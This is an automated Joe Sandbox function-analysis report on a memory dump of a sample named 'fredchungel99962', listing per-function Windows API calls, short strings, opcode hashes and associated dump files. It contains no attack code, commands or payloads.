Opcode ID: ce16fe9e410abc5decf2101f118dbb7695c2a4e36ff86ea34469ade57231afe4
Instruction ID: df994526c5a15f40b0215c030426838b799fd3adbf8e3290914fd2c65b455c3e
Opcode Fuzzy Hash: ce16fe9e410abc5decf2101f118dbb7695c2a4e36ff86ea34469ade57231afe4
Instruction Fuzzy Hash: A5112B76A04358BFD7269FACDC09ADE7FACAB45324F004225FD24D3285D6B1D90187A0

Uniqueness

Uniqueness Score: -1.00%

Function 012DD1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,012DCFF9,00000000,00000004,00000000), ref: 012DD218
GetLastError.KERNEL32 ref: 012DD224
__dosmaperr.LIBCMT ref: 012DD22B
ResumeThread.KERNEL32(00000000), ref: 012DD249

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 21ec2ad5a9aac9a98563f5ad5b24e0ccc0f6e594dd574a829c071b7cecd2c77e
Instruction ID: 135cc8b74ec3e30e5179bc637ba888c56513f9063693dcefbd5f555cdc318e66
Opcode Fuzzy Hash: 21ec2ad5a9aac9a98563f5ad5b24e0ccc0f6e594dd574a829c071b7cecd2c77e
Instruction Fuzzy Hash: D101D23682560ABBDB215BF9DC0DBAA7A6CEF92331F100219FA25961D0CF71D901C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 012B600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 012B604C
GetStockObject.GDI32(00000011), ref: 012B6060
SendMessageW.USER32(00000000,00000030,00000000), ref: 012B606A

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 80a63dbd3c13cdd172ecb9a7b5d9c99d77bc05f40cc86ed15684fd2a32289bf3
Instruction ID: eef2231e4b9c23da84b1554dbfd3f39e1a03e1ec49b9238b0a59f88ea79206e8
Opcode Fuzzy Hash: 80a63dbd3c13cdd172ecb9a7b5d9c99d77bc05f40cc86ed15684fd2a32289bf3
Instruction Fuzzy Hash: E8113972512549BFEB229FA59C85AEABF7DFF083A4F040215FB1452110DB76A8609BA0

Uniqueness

Uniqueness Score: -1.00%

Function 012D3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 012D3B56

Part of subcall function 012D3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 012D3AD2
Part of subcall function 012D3AA3: ___AdjustPointer.LIBCMT ref: 012D3AED

_UnwindNestedFrames.LIBCMT ref: 012D3B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 012D3B7C
CallCatchBlock.LIBVCRUNTIME ref: 012D3BA4

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: 163b40196611f73df4dc6e000f9e566acb5981c3b07b8e20f3bc75958cf3df60
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: 3E01E97211018ABBDF12AF99CC45DEB7F69FF58794F044018FE4896120D732E861DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01317464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0131747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 01317497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 013174AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 013174CA

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 9b32dd7ca86cad7cc507dac1583aa42eb9025ea015e518fdb1691eb859419e04
Instruction ID: 7ea2f5dfdcc1ce87084f551b60420281f9f7deb6203c28dbf1605195945ef54d
Opcode Fuzzy Hash: 9b32dd7ca86cad7cc507dac1583aa42eb9025ea015e518fdb1691eb859419e04
Instruction Fuzzy Hash: E71161B52423059BE7348F58DD09BA27FFCEB00B08F048569A656E6555DF74E904CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0131B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0131ACD3,?,00008000), ref: 0131B0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0131ACD3,?,00008000), ref: 0131B0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0131ACD3,?,00008000), ref: 0131B0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0131ACD3,?,00008000), ref: 0131B126

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 958a9a41a0eb38a5974c4199f4952ca398720f7bf6aa9459acfc3e6d9bd79ffc
Instruction ID: 638ee07a99ac79232ad2b313bbd067870a66758f806e153f08a51258cef7e2dc
Opcode Fuzzy Hash: 958a9a41a0eb38a5974c4199f4952ca398720f7bf6aa9459acfc3e6d9bd79ffc
Instruction Fuzzy Hash: AB112731C0251DE7CF18AFE4E9586EEFB78BB09715F114095D991B218DCB3056508B51

Uniqueness

Uniqueness Score: -1.00%

Function 01312DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 01312DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 01312DD6
GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000), ref: 01312DDD
AttachThreadInput.USER32(00000000,?,00000000), ref: 01312DE4

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 3c25c46629add542debd5eb5de94c85f87b432b95ec1bb4fc6fdd2790e875c25
Instruction ID: 3f6f6b90350187247ad13735bc06e89a4f3f03eae61dd9744089a395c181ea71
Opcode Fuzzy Hash: 3c25c46629add542debd5eb5de94c85f87b432b95ec1bb4fc6fdd2790e875c25
Instruction Fuzzy Hash: D5E06D75202228BBD7341BA6DC0DEEB3E6CEB42BB5F545015F205D10849EA8A440C7B0

Uniqueness

Uniqueness Score: -1.00%

Function 01348863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 012C9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 012C9693
Part of subcall function 012C9639: SelectObject.GDI32(?,00000000), ref: 012C96A2
Part of subcall function 012C9639: BeginPath.GDI32(?), ref: 012C96B9
Part of subcall function 012C9639: SelectObject.GDI32(?,00000000), ref: 012C96E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 01348887
LineTo.GDI32(?,?,?), ref: 01348894
EndPath.GDI32(?), ref: 013488A4
StrokePath.GDI32(?), ref: 013488B2

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: fbb5bc69b1ec62f56a42573fe952e3c0fb4f70cc51d1e9556a245e01e41b7adb
Instruction ID: 67d9f056ae7bd1272483d26992988ed1eab7d3282f71c4e825a8e601b5088853
Opcode Fuzzy Hash: fbb5bc69b1ec62f56a42573fe952e3c0fb4f70cc51d1e9556a245e01e41b7adb
Instruction Fuzzy Hash: 94F05E3A042259BBEB225F98AC09FCE3F5DAF06314F048140FB11650D5CB756551CFE9

Uniqueness

Uniqueness Score: -1.00%

Function 012C98B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32 ref: 012C98CC
SetTextColor.GDI32(?,?), ref: 012C98D6
SetBkMode.GDI32(?,00000001), ref: 012C98E9
GetStockObject.GDI32(00000005), ref: 012C98F1

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 794bc01b7264090c836c2aec9ba1ba4b4fc59a6d44a5e29f13f0b9dae47a3fd9
Instruction ID: 23d2796b85394832cca8f2010d1b87581e810f133478fbb24504a6f95c9efd36
Opcode Fuzzy Hash: 794bc01b7264090c836c2aec9ba1ba4b4fc59a6d44a5e29f13f0b9dae47a3fd9
Instruction Fuzzy Hash: 85E06D35241280ABEB325B78A819BE83F64AB0673AF049219F7FA580D5CB7262409B10

Uniqueness

Uniqueness Score: -1.00%

Function 0131162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32(00000028,00000000,?,00000000,01311089,?,?,?,013111D9), ref: 01311634
OpenThreadToken.ADVAPI32(00000000,?,?,?,013111D9), ref: 0131163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,013111D9), ref: 01311648
OpenProcessToken.ADVAPI32(00000000,?,?,?,013111D9), ref: 0131164F

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 029e23e74ae64fc6b9362b876646c775af13c998ac03b98c10cdc20c69d984ff
Instruction ID: 0f25141d1d640352fb6c8999130f0e81fe93937d3f4305da5c8b7c1c9eb5de9f
Opcode Fuzzy Hash: 029e23e74ae64fc6b9362b876646c775af13c998ac03b98c10cdc20c69d984ff
Instruction Fuzzy Hash: 72E086356032119BD7701FF49D0DB863B7CBF457E5F144808F745C9088DA749040CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0130D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0130D858
GetDC.USER32(00000000), ref: 0130D862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0130D882
ReleaseDC.USER32(?), ref: 0130D8A3

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: b17fd36c88e238746a7890aa1c8c4147eb6f5a466390eb205bdb14e736368760
Instruction ID: 7bf30b73e2542acd63f4006dffba310c45a1a23e7b62d4a5c0a3457813df3fd7
Opcode Fuzzy Hash: b17fd36c88e238746a7890aa1c8c4147eb6f5a466390eb205bdb14e736368760
Instruction Fuzzy Hash: 97E01AB8811205DFCB619FE0D80866DBBF9FB08320F14A059F806E7254CB38A901DF40

Uniqueness

Uniqueness Score: -1.00%

Function 0130D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0130D86C
GetDC.USER32(00000000), ref: 0130D876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0130D882
ReleaseDC.USER32(?), ref: 0130D8A3

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 88b0d68f9fa379a735ca355d5114d57d40295c0c5c1ae9c8f3c10c443750c029
Instruction ID: 0f4a31264cb06a367ae470e4bc836b734e3551b6b3852a12d0c349de4d5ba5a1
Opcode Fuzzy Hash: 88b0d68f9fa379a735ca355d5114d57d40295c0c5c1ae9c8f3c10c443750c029
Instruction Fuzzy Hash: 62E01A78811204DFCB609FA0D80866DBBB9BB08320F14A049E906E7254CB386901DF40

Uniqueness

Uniqueness Score: -1.00%

Function 01324D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 012B7620: _wcslen.LIBCMT ref: 012B7625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 01324ED4

Strings

LPT, xrefs: 01324DFB
*, xrefs: 01324E10

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 8b133c24f5d5dc2c0c23702ebd9e2386b4540d208cc31d79e454b68d33d56b79
Instruction ID: fa45d8944b7364130c244ac2f6de8ec268e74ad1e4884a3dd3c134036245c3d0
Opcode Fuzzy Hash: 8b133c24f5d5dc2c0c23702ebd9e2386b4540d208cc31d79e454b68d33d56b79
Instruction Fuzzy Hash: DC919375A00215EFDB14EF58C4C4EA9BBF5AF84308F198099E80A9F792C735ED85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 012DE27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 012DE30D

Strings

pow, xrefs: 012DE2E5, 012DE302

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 18ac84502550f084c171a2cc64e281db5b0f7efeb907008834d54dbf00806d4d
Instruction ID: f12b3dcf4f9ede37dc08ac2149e913cb0e7b1f3f27acb141baa12ca8af3fcbf3
Opcode Fuzzy Hash: 18ac84502550f084c171a2cc64e281db5b0f7efeb907008834d54dbf00806d4d
Instruction Fuzzy Hash: 95519F62A3820396DB26771CC90937A3FD8EB40B40F644D58E2D54A2DDEF3588958BC6

Uniqueness

Uniqueness Score: -1.00%

Function 012CE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 012CE1B1

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 2801849c50d8a12e80bcc813c890aacf446303ec14f5f798750101ef8506a647
Instruction ID: 8aa92d13be1189c1a7616edcb99889460ca6c01105b2892eea1411396936ec8f
Opcode Fuzzy Hash: 2801849c50d8a12e80bcc813c890aacf446303ec14f5f798750101ef8506a647
Instruction Fuzzy Hash: BF514675A00246DFEB26DF28C0906FA7FE5EF65B14F248529EE919B2C0D7309942CB91

Uniqueness

Uniqueness Score: -1.00%

Function 012CF291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 012CF2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 012CF2BB

Strings

@, xrefs: 012CF2AF

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 9c25df3bc78beb635d4eea76156660ce8019f159ea7618fd376bc8a90b9b567c
Instruction ID: f6bcc6cd405fc906180010fd9203385ead9e767ea55afe020cc8461027f64639
Opcode Fuzzy Hash: 9c25df3bc78beb635d4eea76156660ce8019f159ea7618fd376bc8a90b9b567c
Instruction Fuzzy Hash: C55124715187459BD320AF10D885BABBBF8FBD4340F81885DF199811A4EB709529CB66

Uniqueness

Uniqueness Score: -1.00%

Function 01335745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 013357E0
_wcslen.LIBCMT ref: 013357EC

Strings

CALLARGARRAY, xrefs: 013357E6, 013357EB

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 17a2136deb5eff40a210f44f1006da190b75620d54ebfed5a8362c2f74ce625a
Instruction ID: d5f2b16054accce3f4e9ad30cde0b2b20bdcb43b0dc7897652662b6ea3be50c1
Opcode Fuzzy Hash: 17a2136deb5eff40a210f44f1006da190b75620d54ebfed5a8362c2f74ce625a
Instruction Fuzzy Hash: 0841A171E0021ADFCB14DFA8C8818FEBBF5FF98368F144129E505AB251E7349981CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0132D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0132D130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0132D13A

Strings

|, xrefs: 0132D10B

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: c29372324041e09863a5f1bbe30d813bc415dcab8cd5030ec63b0192563be2ed
Instruction ID: 38fc350949739bce8dc6850cb01778e997ddea8622c571b6e8b50467e3e6da4f
Opcode Fuzzy Hash: c29372324041e09863a5f1bbe30d813bc415dcab8cd5030ec63b0192563be2ed
Instruction Fuzzy Hash: 3E313B71D1021AAFDF15EFA4CC84EEEBFB9FF14344F100019E915A61A5EB31AA46CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0134356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 01343621
MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0134365C

Strings

static, xrefs: 013435BC

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

